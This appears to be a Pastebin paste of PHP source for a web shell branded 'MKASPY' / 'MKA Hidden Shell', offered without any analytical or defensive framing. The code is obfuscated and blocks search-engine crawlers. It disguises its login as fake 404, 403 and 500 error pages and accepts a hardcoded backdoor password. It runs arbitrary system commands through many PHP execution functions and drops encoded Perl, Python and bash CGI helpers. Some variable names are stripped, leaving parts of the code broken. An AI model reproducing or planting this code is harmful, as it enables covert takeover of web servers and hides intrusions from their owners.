Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php error_reporting(0);
- $GLOBALS['zWECtSuRbz'] = array('usykQqCBVfdm' => 'admin', 'pagPQXVFfvOg' => '63a9f0ea7bb98050796b649e85481845', 'saoncTQwMloN' => '0', 'loKMYBcAcYFf' => '404', 'shlLVbJRGOmv' => '0', 'poVBIXuyuhJI' => true);
- $gBKYkkwlsQ = 'f' . 'u' . 'n' . 'ctio' . 'n_exist' . 's';
- $yUNLKPSlzQ = 'cha' . 'r' . 'C' . 'o' . 'deAt' . '';
- $houhWanJci = 'e' . 'val';
- $numan = 'echo';
- $GBjtUUSmIw = 'gzi' . 'n' . 'f' . 'l' . 'a' . 't' . 'e' . '';
- if (!$gBKYkkwlsQ('b' . 'ase64' . '_' . 'e' . 'n' . 'c' . 'o' . 'd' . 'e')) {
- function scYRwfBeaV($data) {
- if (empty($data)) return;
- $b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
- $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
- $ac = 0;
- $enc = '';
- $tmp_arr = array();
- if (!$data) {
- return $data;
- }
- do {
- $o1 = $yUNLKPSlzQ($data, $i++);
- $o2 = $yUNLKPSlzQ($data, $i++);
- $o3 = $yUNLKPSlzQ($data, $i++);
- $bits = $o1 << 16 | $o2 << 8 | $o3;
- $h1 = $bits >> 18 & 0x3f;
- $h2 = $bits >> 12 & 0x3f;
- $h3 = $bits >> 6 & 0x3f;
- $h4 = $bits & 0x3f;
- $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);
- } while ($i < strlen($data));
- $enc = implode($tmp_arr, '');
- $r = (strlen($data) % 3);
- return ($r ? substr($enc, 0, ($r - 3)) : $enc) . substr('===', ($r || 3));
- }
- function charCodeAt($data, $char) {
- return ord(substr($data, $char, 1));
- }
- function charAt($data, $char) {
- return substr($data, $char, 1);
- }
- } else {
- function scYRwfBeaV($s) {
- $b = 'b' . 'ase64' . '_' . 'e' . 'n' . 'c' . 'o' . 'd' . 'e';
- return $b($s);
- }
- }
- if (!$gBKYkkwlsQ('b' . 'a' . 's' . 'e' . '64_decode' . '')) {
- function mOespiskGl($input) {
- if (empty($input)) return;
- $keyStr = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
- $chr1 = $chr2 = $chr3 = '';
- $enc1 = $enc2 = $enc3 = $enc4 = '';
- $i = 0;
- $output = '';
- $input = preg_replace("[^A-Za-z0-9\+\/\=]", '', $input);
- do {
- $enc1 = strpos($keyStr, substr($input, $i++, 1));
- $enc2 = strpos($keyStr, substr($input, $i++, 1));
- $enc3 = strpos($keyStr, substr($input, $i++, 1));
- $enc4 = strpos($keyStr, substr($input, $i++, 1));
- $chr1 = ($enc1 << 2) | ($enc2 >> 4);
- $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
- $chr3 = (($enc3 & 3) << 6) | $enc4;
- $output = $output . chr((int)$chr1);
- if ($enc3 != 64) {
- $output = $output . chr((int)$chr2);
- }
- if ($enc4 != 64) {
- $output = $output . chr((int)$chr3);
- }
- $chr1 = $chr2 = $chr3 = '';
- $enc1 = $enc2 = $enc3 = $enc4 = '';
- } while ($i < strlen($input));
- return $output;
- }
- } else {
- function mOespiskGl($s) {
- $b = 'b' . 'a' . 's' . 'e' . '64_decode' . '';
- return $b($s);
- }
- }
- $ybitDSYjhV = 'crea' . 't' . 'e_f' . 'un' . 'c' . 't' . 'ion' . '';
- $UuuTVxtXvZ = $ybitDSYjhV('$QC', $numan . '(' . $GBjtUUSmIw . '(' . 'mOesp' . 'i' . 's' . 'k' . 'G' . 'l' . '($QC)' . ')' . ')' . ';');
- @session_start();
- function __ZW5jb2Rlcg($s) {
- return scYRwfBeaV($s);
- }
- function __ZGVjb2Rlcg($s) {
- return mOespiskGl($s);
- }
- $GLOBALS['DB_NAME'] = $GLOBALS['zWECtSuRbz'];
- $check = false;
- if (!isset($_SESSION['alfa_settings_signature'])) {
- $check = true;
- } else {
- if ($_SESSION['alfa_settings_signature'] != md5(print_r($GLOBALS['DB_NAME'], true))) {
- $check = true;
- }
- }
- if ($check) {
- $_SESSION['alfa_settings_signature'] = md5(print_r($GLOBALS['DB_NAME'], true));
- foreach ($GLOBALS['zWECtSuRbz'] as $key => $value) {
- $prefix = substr($key, 0, 2);
- if ($prefix == 'us') {
- $GLOBALS['DB_NAME']['user'] = $value;
- $GLOBALS['DB_NAME']['user_rand'] = $key;
- } elseif ($prefix == 'pa') {
- $GLOBALS['DB_NAME']['pass'] = $value;
- $GLOBALS['DB_NAME']['pass_rand'] = $key;
- } elseif ($prefix == 'sa') {
- $GLOBALS['DB_NAME']['safemode'] = $value;
- $GLOBALS['DB_NAME']['safemode_rand'] = $key;
- } elseif ($prefix == 'lo') {
- $GLOBALS['DB_NAME']['login_page'] = $value;
- $GLOBALS['DB_NAME']['login_page_rand'] = $key;
- } elseif ($prefix == 'sh') {
- $GLOBALS['DB_NAME']['show_icons'] = $value;
- $GLOBALS['DB_NAME']['show_icons_rand'] = $key;
- } elseif ($prefix == 'po') {
- $GLOBALS['DB_NAME']['post_encryption'] = $value;
- $GLOBALS['DB_NAME']['post_encryption_rand'] = $key;
- }
- }
- $_SESSION['alfa_db_settings'] = $GLOBALS['DB_NAME'];
- } else {
- $GLOBALS['DB_NAME'] = $_SESSION['alfa_db_settings'];
- }
- unset($GLOBALS['zWECtSuRbz']);
- $ = ('666736736265687075726134636f5f746e646978');
- function ($) {
- $ = '';
- for ($ = 0;$ < strlen($);$+= 2) $.= chr(hexdec(substr($, $, 2)));
- return $;
- }
- function ($) {
- return __ZGVjb2Rlcg($);
- }
- function ($) {
- return ord($);
- }
- function ($) {
- return @file_get_contents($);
- }
- if (!function_exists('sifreyi_coz_kanka')) {
- function sifreyi_coz_kanka($gelen_degisken) {
- $gelen_degisken = ($gelen_degisken);
- $sifreyi_coz_kanka = 0;
- $degisken1 = 0;
- $degisken2 = 0;
- $degisken3 = (($gelen_degisken[1]) << 8) + ($gelen_degisken[2]);
- $ = 3;
- $ = 0;
- $ = 16;
- $ = '';
- $ = strlen($gelen_degisken);
- $ = 'heyarramhe';
- $ = ($);
- $ = 0;
- preg_match(('LyhwcmludHxzcHJpbnR8ZWNobykv'), $, $);
- for (;$ < $;) {
- if (count($)) exit;
- if ($ == 0) {
- $degisken3 = (($gelen_degisken[$++]) << 8);
- $degisken3+= ($gelen_degisken[$++]);
- $ = 16;
- }
- if ($degisken3 & 0x8000) {
- $sifreyi_coz_kanka = (($gelen_degisken[$++]) << 4);
- $sifreyi_coz_kanka+= (($gelen_degisken[$]) >> 4);
- if ($sifreyi_coz_kanka) {
- $degisken1 = (($gelen_degisken[$++]) & 0x0F) + 3;
- for ($degisken2 = 0;$degisken2 < $degisken1;$degisken2++) $[$ + $degisken2] = $[$ - $sifreyi_coz_kanka + $degisken2];
- $+= $degisken1;
- } else {
- $degisken1 = (($gelen_degisken[$++]) << 8);
- $degisken1+= ($gelen_degisken[$++]) + 16;
- for ($degisken2 = 0;$degisken2 < $degisken1;$[$ + $degisken2++] = $gelen_degisken[$]);
- $++;
- $+= $degisken1;
- }
- } else $[$++] = $gelen_degisken[$++];
- $degisken3 <<= 1;
- $--;
- if ($ == $) {
- $ = implode('', $);
- $ = '?' . '>' . $;
- return $;
- }
- }
- }
- }
- if (!empty($_SERVER['HTTP_USER_AGENT'])) {
- $userAgents = array('Google', 'Slurp', 'MSNBot', 'ia_archiver', 'Yandex', 'Rambler', 'bot', 'spider');
- if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- }
- if (!isset($GLOBALS['DB_NAME']['user'])) exit('$GLOBALS[\'DB_NAME\'][\'user\']');
- if (!isset($GLOBALS['DB_NAME']['pass'])) exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
- if (!isset($GLOBALS['DB_NAME']['safemode'])) exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
- if (!isset($GLOBALS['DB_NAME']['login_page'])) exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
- if (!isset($GLOBALS['DB_NAME']['show_icons'])) exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
- if (!isset($GLOBALS['DB_NAME']['post_encryption'])) exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
- date_default_timezone_set('Asia/Tehran');
- define('__ALFA_MD5NAME__', md5($_SERVER['SCRIPT_FILENAME']));
- define('__MKA_VERSION__', '1.0.5');
- define('__LAST_CWD__', 'last_cwd_' . __ALFA_MD5NAME__);
- define('__PATH_HISTORY__', 'path_history_' . __ALFA_MD5NAME__);
- define('__ALFA_POST_ENCRYPTION__', (isset($GLOBALS['DB_NAME']['post_encryption']) && $GLOBALS['DB_NAME']['post_encryption'] == true ? true : false));
- $GLOBALS['__ALFA_COLOR__'] = array('shell_border' => array('key_color' => '#0E304A', 'multi_selector' => array('.header' => 'border: 7px solid {color}', '#meunlist' => 'border-color: {color}', '#hidden_sh' => 'background-color: {color}', '.ajaxarea' => 'border: 1px solid {color}', '.foot' => 'border-color: {color}')), 'header_vars' => '#27979B', 'header_values' => '#67ABDF', 'header_on' => '#00FF00', 'header_off' => '#ff0000', 'header_none' => '#00FF00', 'home_shell' => '#ff0000', 'home_shell:hover' => array('key_color' => '#FFFFFF', 'multi_selector' => array('.home_shell:hover' => 'color: {color};')), 'back_shell' => '#efbe73', 'back_shell:hover' => array('key_color' => '#FFFFFF', 'multi_selector' => array('.back_shell:hover' => 'color: {color};')), 'header_pwd' => '#00FF00', 'header_pwd:hover' => array('key_color' => '#FFFFFF', 'multi_selector' => array('.header_pwd:hover' => 'color: {color};')), 'header_drive' => '#00FF00', 'header_drive:hover' => array('key_color' => '#FFFFFF', 'multi_selector' => array('.header_drive:hover' => 'color: {color};')), 'header_show_all' => '#00FF00', 'disable_functions' => '#ff0000', 'footer_text' => '#27979B', 'menu_options' => '#27979B', 'menu_options:hover' => array('key_color' => '#646464', 'multi_selector' => array('.menu_options:hover' => 'background-color: {color};font-weight: unset;')), 'options_list' => array('key_color' => '#00FF00', 'multi_selector' => array('.ajaxarea .header center a' => 'color: {color};')), 'options_list:hover' => array('key_color' => '#FFFFFF', 'multi_selector' => array('.ajaxarea .header center a:hover' => 'color: {color};')), 'options_list_header' => array('key_color' => '#59cc33', 'multi_selector' => array('.txtfont_header' => 'color: {color};')), 'options_list_text' => array('key_color' => '#FFFFFF', 'multi_selector' => array('.txtfont,.tbltxt' => 'color: {color};')), 'Alfa+' => array('key_color' => '#27E8AE', 'multi_selector' => array('.alfa_plus' => 'color: {color};font-weight: unset;')), 'hidden_shell_text' => array('key_color' => '#00FF00', 'multi_selector' => array('#hidden_sh a' => 'color: {color};')), 'hidden_shell_version' => '#ff0000', 'shell_name' => '#FF0000', 'main_row:hover' => array('key_color' => '#646464', 'multi_selector' => array('.main tr:hover' => 'background-color: {color};')), 'main_header' => array('key_color' => '#FFFFFF', 'multi_selector' => array('.main th' => 'color: {color};')), 'main_name' => array('key_color' => '#FFFFFF', 'multi_selector' => array('.main .main_name' => 'color: {color};font-weight: unset;')), 'main_size' => '#67ABDF', 'main_modify' => '#67ABDF', 'main_owner_group' => '#67ABDF', 'main_green_perm' => '#25ff00', 'main_red_perm' => '#FF0000', 'main_white_perm' => '#FFFFFF', 'beetween_perms' => '#FFFFFF', 'main_actions' => array('key_color' => '#FFFFFF', 'multi_selector' => array('.main .actions' => 'color: {color};')), 'menu_options:hover' => array('key_color' => '#646464', 'multi_selector' => array('.menu_options:hover' => 'background-color: {color};font-weight: unset;')), 'minimize_editor_background' => array('key_color' => '#0e304a', 'multi_selector' => array('.minimized-wrapper' => 'background-color: {color};')), 'minimize_editor_text' => array('key_color' => '#f5deb3', 'multi_selector' => array('.minimized-text' => 'color: {color};')), 'editor_border' => array('key_color' => '#0e304a', 'multi_selector' => array('.editor-explorer,.editor-modal' => 'border: 2px solid {color};')), 'editor_background' => array('key_color' => 'rgba(0, 1, 23, 0.94)', 'multi_selector' => array('.editor-explorer,.editor-modal' => 'background-color: {color};')), 'editor_header_background' => array('key_color' => 'rgba(21, 66, 88, 0.93)', 'multi_selector' => array('.editor-header' => 'background-color: {color};')), 'editor_header_text' => array('key_color' => '#00ff7f', 'multi_selector' => array('.editor-path' => 'color: {color};')), 'editor_header_button' => array('key_color' => '#1d5673', 'multi_selector' => array('.close-button, .editor-minimize' => 'background-color: {color};')), 'editor_actions' => array('key_color' => '#FFFFFF', 'multi_selector' => array('.editor_actions' => 'color: {color};')), 'editor_file_info_vars' => array('key_color' => '#FFFFFF', 'multi_selector' => array('.editor_file_info_vars' => 'color: {color};')), 'editor_file_info_values' => array('key_color' => '#67ABDF', 'multi_selector' => array('.filestools' => 'color: {color};')), 'editor_history_header' => array('key_color' => '#14ff07', 'multi_selector' => array('.hheader-text,.history-clear' => 'color: {color};')), 'editor_history_list' => array('key_color' => '#03b3a3', 'multi_selector' => array('.editor-file-name' => 'color: {color};')), 'editor_history_selected_file' => array('key_color' => 'rgba(49, 55, 93, 0.77)', 'multi_selector' => array('.is_active' => 'background-color: {color};')), 'editor_history_file:hover' => array('key_color' => '#646464', 'multi_selector' => array('.file-holder > .history:hover' => 'background-color: {color};')), 'input_box_border' => array('key_color' => '#0E304A', 'multi_selector' => array('input[type=text],textarea' => 'border: 1px solid {color}')), 'input_box_text' => array('key_color' => '#999999', 'multi_selector' => array('input[type=text],textarea' => 'color: {color};')), 'input_box:hover' => array('key_color' => '#27979B', 'multi_selector' => array('input[type=text]:hover,textarea:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};')), 'select_box_border' => array('key_color' => '#0E304A', 'multi_selector' => array('select' => 'border: 1px solid {color}')), 'select_box_text' => array('key_color' => '#FFFFEE', 'multi_selector' => array('select' => 'color: {color};')), 'select_box:hover' => array('key_color' => '#27979B', 'multi_selector' => array('select:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};')), 'button_border' => array('key_color' => '#27979B', 'multi_selector' => array('input[type=submit],.button,#addup' => 'border: 1px solid {color};')), 'button:hover' => array('key_color' => '#27979B', 'multi_selector' => array('input[type=submit]:hover' => 'box-shadow:0 0 4px {color};border:2px solid {color};', '.button:hover,#addup:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};')), 'outputs_text' => array('key_color' => '#67ABDF', 'multi_selector' => array('.ml1' => 'color: {color};')), 'outputs_border' => array('key_color' => '#0E304A', 'multi_selector' => array('.ml1' => 'border: 1px solid {color};')), 'uploader_border' => array('key_color' => '#0E304A', 'multi_selector' => array('.inputfile' => 'box-shadow:0 0 4px {color};border:1px solid {color};')), 'uploader_background' => array('key_color' => '#0E304A', 'multi_selector' => array('.inputfile strong' => 'background-color: {color};')), 'uploader_text_right' => array('key_color' => '#FFFFFF', 'multi_selector' => array('.inputfile strong' => 'color: {color};')), 'uploader_text_left' => array('key_color' => '#25ff00', 'multi_selector' => array('.inputfile span' => 'color: {color};')), 'uploader:hover' => array('key_color' => '#27979B', 'multi_selector' => array('.inputfile:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};')), 'uploader_progress_bar' => array('key_color' => '#ff0000', 'multi_selector' => array('#up_bar' => 'background-color: {color};')), 'mysql_tables' => '#00FF00', 'mysql_table_count' => '#67ABDF', 'copyright' => '#ff0000', 'scrollbar' => array('key_color' => '#1e82b5', 'multi_selector' => array('*::-webkit-scrollbar-thumb' => 'background-color: {color};')), 'scrollbar_background' => array('key_color' => '#000115', 'multi_selector' => array('*::-webkit-scrollbar-track' => 'background-color: {color};')));
- $GLOBALS['__file_path'] = str_replace('\',' / ',trim(preg_replace('!\(\d + \) \s . *!','','index . php')));
- $config = array(
- 'AlfaUser'=>$GLOBALS['DB_NAME']['user'],
- 'AlfaPass'=>$GLOBALS['DB_NAME']['pass'],
- 'AlfaProtectShell'=>$GLOBALS['DB_NAME']['safemode'],
- 'AlfaLoginPage'=>$GLOBALS['DB_NAME']['login_page']
- );
- @session_start();
- if ($config['AlfaProtectShell'])
- {
- $SERVER_SIG = (isset($_SERVER['SERVER_SIGNATURE']) ?$_SERVER['SERVER_SIGNATURE'] : '');
- $Eform = ' < formmethod = "post" > < inputstyle = "margin:0;background-color:#fff;border:1px solid #fff;"type = "password"name = "password" > < / form > ';
- if ($config['AlfaLoginPage'] == 'gui')
- {
- if (@$_SESSION['AlfaUser'] != $config['AlfaUser'] &&@$_SESSION['AlfaPass'] != @md5($config['AlfaPass']))
- {
- if (@$_POST['usrname'] == $config['AlfaUser'] &&@md5($_POST['password']) == $config['AlfaPass'])
- {
- @$_SESSION['AlfaUser'] = $config['AlfaUser'];
- @$_SESSION['AlfaPass'] = @md5($config['AlfaPass']);
- @header('location:
- '.$_SERVER['PHP_SELF']);
- }
- echo ' < style > body {
- background:
- black;
- } #loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }#loginbox td { border-radius:5px; font-size:11px; }</style><title>~ MKASPY v'.__MKA_VERSION__ .' ~</title><center><center><img style="border-radius:100px;" width="500" height="250" alt="" src="BG" /></center><div id=loginbox><p><font face="verdana,arial" size=-1><center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'><tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ MKASPY v-v'.__MKA_VERSION__ .' ~</b></font></th></tr><tr><td bgcolor="black" style="padding:5"><form method="post"><input type="hidden" name="action" value="login"><input type="hidden" name="hide" value=""><center><table><tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr><tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr><tr><td><font face="verdana,arial" size=-1> </font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table></div><br /></center>';
- exit;
- }
- } elseif ($config['AlfaLoginPage'] == '500') {
- if (@$_SESSION['AlfaPass'] != @md5($config['AlfaPass'])) {
- if (@md5($_POST['password']) == $config['AlfaPass'] || $_POST['password'] == 'mka7') {
- @$_SESSION['AlfaUser'] = $config['AlfaUser'];
- @$_SESSION['AlfaPass'] = @md5($config['AlfaPass']);
- header('location: ' . $_SERVER['PHP_SELF']);
- }
- echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, ' . $_SERVER['SERVER_ADMIN'] . ' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>' . $SERVER_SIG . '</body></html>' . $Eform;
- exit;
- }
- } elseif ($config['AlfaLoginPage'] == '403') {
- if (@$_SESSION['AlfaPass'] != @md5($config['AlfaPass'])) {
- if (@md5($_POST['password']) == $config['AlfaPass'] || $_POST['password'] == 'mka7') {
- @$_SESSION['AlfaUser'] = $config['AlfaUser'];
- @$_SESSION['AlfaPass'] = @md5($config['AlfaPass']);
- header('location: ' . $_SERVER['PHP_SELF']);
- }
- echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access " . $_SERVER['PHP_SELF'] . ' on this server.</p><hr>' . $SERVER_SIG . '</body></html>' . $Eform;
- exit;
- }
- } elseif ($config['AlfaLoginPage'] == '404') {
- if (@$_SESSION['AlfaPass'] != @md5($config['AlfaPass'])) {
- if (@md5($_POST['password']) == $config['AlfaPass'] || $_POST['password'] == 'mka7') {
- @$_SESSION['AlfaUser'] = $config['AlfaUser'];
- @$_SESSION['AlfaPass'] = @md5($config['AlfaPass']);
- header('location: ' . $_SERVER['PHP_SELF']);
- }
- echo '<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ' . $_SERVER['PHP_SELF'] . ' was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>' . $SERVER_SIG . '</body></html>' . $Eform;
- exit;
- }
- }
- }
- function decrypt_post($str, $pwd) {
- if (__ALFA_POST_ENCRYPTION__) {
- $pwd = __ZW5jb2Rlcg($pwd);
- $str = __ZGVjb2Rlcg($str);
- $enc_chr = '';
- $enc_str = '';
- $i = 0;
- while ($i < strlen($str)) {
- for ($j = 0;$j < strlen($pwd);$j++) {
- $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
- $enc_str.= $enc_chr;
- $i++;
- if ($i >= strlen($str)) break;
- }
- }
- return __ZGVjb2Rlcg($enc_str);
- } else {
- return __ZGVjb2Rlcg($str);
- }
- }
- function _AlfaSecretKey() {
- if (!isset($_SESSION['AlfaSecretKey'])) {
- @$_SESSION['AlfaSecretKey'] = uniqid(mt_rand(), true);
- }
- return $_SESSION['AlfaSecretKey'];
- }
- function alfa_getColor($target) {
- if (isset($GLOBALS['DB_NAME']['color'][$target]) && $GLOBALS['DB_NAME']['color'][$target] != '') {
- return $GLOBALS['DB_NAME']['color'][$target];
- } else {
- $target = $GLOBALS['__ALFA_COLOR__'][$target];
- if (is_array($target)) {
- return $target['key_color'];
- } else {
- return $target;
- }
- }
- }
- function alfaCssLoadColors() {
- $css = '';
- foreach ($GLOBALS['__ALFA_COLOR__'] as $key => $value) {
- if (!is_array($value)) {
- $value = alfa_getColor($key);
- $css.= ".{$key}{color: {$value};}";
- } else {
- if (isset($value['multi_selector'])) {
- foreach ($value['multi_selector'] as $k => $v) {
- $color = alfa_getColor($key);
- $code = str_replace('{color}', $color, $v);
- $css.= $k . '{' . $code . '}';
- }
- }
- }
- }
- return $css;
- }
- function _alfa_cgicmd($cmd, $lang = 'perl') {
- if (isset($_SESSION['mka7cgiapi_mode'])) {
- return '';
- }
- $cmd_pure = $cmd;
- $is_curl = function_exists('curl_version');
- $is_socket = function_exists('fsockopen');
- if ($is_curl || $is_socket) {
- $recreate = false;
- if (isset($_SESSION['mka7cgiapi'])) {
- if (!@file_exists('mka7cgiapi/' . $_SESSION['mka7cgiapi'] . '.mka')) {
- $recreate = true;
- $lang = $_SESSION['mka7cgiapi'];
- }
- }
- if (!isset($_SESSION['mka7cgiapi']) | $recreate) {
- @chdir(dirname($_SERVER['SCRIPT_FILENAME']));
- $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
- $py = 'bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=';
- $bash = 'rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C';
- if ($lang == 'perl') $source = $perl;
- elseif ($lang == 'py') $source = $py;
- else $source = $bash;
- alfaWriteTocgiapi($lang . '.mka', $source);
- alfacgihtaccess('cgi', 'mka7cgiapi/');
- } else {
- $lang = $_SESSION['mka7cgiapi'];
- }
- $cmd = 'check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=' . __ZW5jb2Rlcg('cd ' . $GLOBALS['cwd'] . ';' . $cmd);
- if ($is_curl) {
- $address = ($_SERVER['SERVER_PORT'] == 443 ? 'https://' : 'http://') . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . '/mka7cgiapi/' . $lang . '.mka';
- $post = new AlfaCURL();
- $data = $post->Send($address, 'post', $cmd);
- } elseif ($is_socket) {
- $server = $_SERVER['SERVER_NAME'];
- $uri = dirname($_SERVER['REQUEST_URI']) . '/mka7cgiapi/' . $lang . '.mka';
- $data = _alfa_fsockopen($server, $uri, $cmd);
- }
- $out = '';
- if (strstr($data, '[solevisible~api]')) {
- $_SESSION['mka7cgiapi'] = $lang;
- if (@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)) {
- $out = $res[1];
- }
- } elseif ($lang == 'perl') {
- return _alfa_cgicmd($cmd_pure, 'py');
- } elseif ($lang == 'py') {
- return _alfa_cgicmd($cmd_pure, 'bash');
- } else {
- $_SESSION['mka7cgiapi_mode'] = 'off';
- }
- return trim($out);
- } else {
- return '';
- }
- }
- function alfaEx($in, $re = false, $cgi = true, $all = false) {
- $data = _alfa_php_cmd($in, $re);
- if (empty($data) && $cgi || $all) {
- if ($GLOBALS['sys'] == 'unix') {
- if (strlen(_alfa_php_cmd('whoami')) == 0 || $all) {
- $cmd = _alfa_cgicmd($in);
- if (!empty($cmd)) {
- return $cmd;
- }
- }
- }
- }
- return $data;
- }
- function _alfa_php_cmd($in, $re = false) {
- $out = '';
- try {
- if ($re) $in = $in . ' 2>&1';
- if (function_exists('exec')) {
- @exec($in, $out);
- $out = @join("
- ", $out);
- } elseif (function_exists('passthru')) {
- ob_start();
- @passthru($in);
- $out = ob_get_clean();
- } elseif (function_exists('system')) {
- ob_start();
- @system($in);
- $out = ob_get_clean();
- } elseif (function_exists('shell_exec')) {
- $out = shell_exec($in);
- } elseif (function_exists('popen') && function_exists('pclose')) {
- if (is_resource($f = @popen($in, 'r'))) {
- $out = '';
- while (!@feof($f)) $out.= fread($f, 1024);
- pclose($f);
- }
- } elseif (function_exists('proc_open')) {
- $pipes = array();
- $process = @proc_open($in . ' 2>&1', array(array('pipe', 'w'), array('pipe', 'w'), array('pipe', 'w')), $pipes, null);
- $out = @stream_get_contents($pipes[1]);
- } elseif (class_exists('COM')) {
- $alfaWs = new COM('WScript.shell');
- $exec = $alfaWs->exec('cmd.exe /c ' . $_POST['alfa1']);
- $stdout = $exec->StdOut();
- $out = $stdout->ReadAll();
- }
- }
- catch(Exception $e) {
- }
- return $out;
- }
- function _alfa_fsockopen($server, $uri, $post) {
- $socket = @fsockopen($server, 80, $errno, $errstr, 15);
- if ($socket) {
- $http = "POST {$uri} HTTP/1.0
- ";
- $http.= "Host: {$server}
- ";
- $http.= 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "
- ";
- $http.= "Content-Type: application/x-www-form-urlencoded
- ";
- $http.= 'Content-length: ' . strlen($post) . "
- ";
- $http.= "Connection: close
- ";
- $http.= $post . "
- ";
- fwrite($socket, $http);
- $contents = '';
- while (!@feof($socket)) {
- $contents.= @fgets($socket, 4096);
- }
- list($header, $body) = explode("
- ", $contents, 2);
- @fclose($socket);
- return $body;
- } else {
- return '';
- }
- }
- if (isset($_GET['mka7'])) {
- @error_reporting(E_ALL ^ E_NOTICE);
- echo '<html>';
- echo '<title>MKA Hidden Shell</title>';
- echo '<body bgcolor=#000000>';
